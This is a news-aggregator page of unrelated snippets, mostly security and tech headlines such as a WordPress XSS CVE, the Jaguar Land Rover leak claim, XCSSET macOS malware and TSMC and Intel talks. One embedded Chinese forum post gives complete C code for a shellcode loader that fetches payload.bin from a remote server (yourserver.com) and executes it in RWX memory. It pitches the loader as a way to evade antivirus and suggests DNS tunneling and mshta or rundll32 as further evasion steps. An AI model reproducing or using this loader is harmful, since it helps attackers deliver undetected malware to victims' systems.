Aggregator

Apple предупреждает о сложных атаках на пользователей.

杀毒软件的检测方式，主要还是靠特征匹配，虽然现在有很多行为分析的杀软，但归根结底，它们还是在监控API 调用模式。问题是，合法软件和恶意软件调用的 API 大部分是一样的，所以行为检测很容易误判。而且，只要换个编译器、改改代码，很多恶意软件就能成功绕过查杀。

为了更稳妥地避开杀毒软件，我们可以采用远程分离免杀（Remote Loader）的方法——本地只运行一个下载器（Loader），shellcode放在远程服务器上，运行时再下载并执行，本地并无实际文件落地；这样杀软在扫描本地文件时什么都抓不到。

远程分离免杀流程：

1. 编写远程加载器（Remote Loader），用于从远程服务器下载 payload.bin。
2. 服务器端存储 payload.bin，可使用加密存储，降低被溯源风险。
3. Loader 运行时下载 payload.bin 并解密执行**，避免本地文件存储，提高免杀能力。

简单实现：写个远程 Loader：
下面这段 C 代码演示了如何从远程服务器下载 payload.bin 并执行：

#include <stdio.h> #include <windows.h> #include <urlmon.h> #pragma comment(lib, "urlmon.lib") #define REMOTE_URL "http://yourserver.com/payload.bin" #define LOCAL_FILE "C:\\Windows\\Temp\\payload.bin" int main() { // 下载 payload.bin if (URLDownloadToFileA(NULL, REMOTE_URL, LOCAL_FILE, 0, NULL) != S_OK) { printf("下载失败\n"); return -1; } // 读取 payload.bin HANDLE hFile = CreateFileA(LOCAL_FILE, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("打开文件失败\n"); return -1; } DWORD dwSize = GetFileSize(hFile, NULL); LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ReadFile(hFile, lpAddress, dwSize, NULL, NULL); CloseHandle(hFile); // 直接执行 ((void(*)())lpAddress)(); return 0; }

思路很简单：

• 用 URLDownloadToFileA 把 payload.bin 下载到 C:\Windows\Temp\。
• 读取文件到内存。
• 直接执行。

这样做到了一个基本的分离免杀，持续想要优化的话可以使用纯内存加载（不落地）并融合一下加密、反沙箱等方法，进一步优化还可以，改用 DNS 隧道传输 payload.bin，绕过常规的流量监控。或者是利用 Windows 自带工具（如 mshta.exe、rundll32.exe）加载。

1 个帖子 - 1 位参与者

阅读完整话题

谷歌 2024 年漏洞赏金计划，1200 万美元奖励安全研究人员，诚邀白帽黑客找bug

A vulnerability was found in djeet Finale Lite Plugin up to 2.19.0 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. This vulnerability is handled as CVE-2024-12589. The attack may be launched remotely. There is no exploit available.

关于哪些职业会受到AI冲击的讨论从未停止，而渗透测试（Pentesting）最近也被推到了风口浪尖。

平均每人可领取超13万元

Luchtverdedigings- en commandofregat Zr.Ms. De Ruyter heeft gisteren een Tomahawk-raket gelanceerd. Dat gebeurde voor de kust van het Amerikaanse Norfolk. Het was voor het eerst dat een Nederlands marineschip dit type raket afschoot.

A threat actor operating under the alias “Rey” has allegedly compromised the internal systems of Jaguar Land Rover (JLR), one of the United Kingdom’s most prominent automotive manufacturers, and leaked approximately 700 internal documents containing sensitive technical and operational data.  The breach, first announced on a dark web forum frequented by cybersecurity researchers and malicious […]

The post Jaguar Land Rover Allegedly Hacked – Threat Actor Leaked 700 Internal Documents appeared first on Cyber Security News.

Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users. The […]

The post New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation appeared first on Cyber Security News.

台积电向英伟达、AMD 和博通公司发出成立合资企业的提议，该合资企业将运营英特尔的芯片工厂，台积电负责芯片制造业务的运营，其持股比例不超过 50%。高通公司也是台积电积极推销该计划的对象之一。关于英特尔的任何交易都需要特朗普政府的批准，特朗普政府不希望由外资完全拥有英特尔或其芯片制造业务。英特尔、台积电、英伟达、AMD 和高通都拒绝置评这一报道。芯片巨头的市值过去一年下跌了一半以上，2024 年净亏损 188 亿美元。报道称，英特尔拒绝将其芯片设计和制造业务分开出售。而台积电希望合资企业的投资者也将成为公司的主要客户。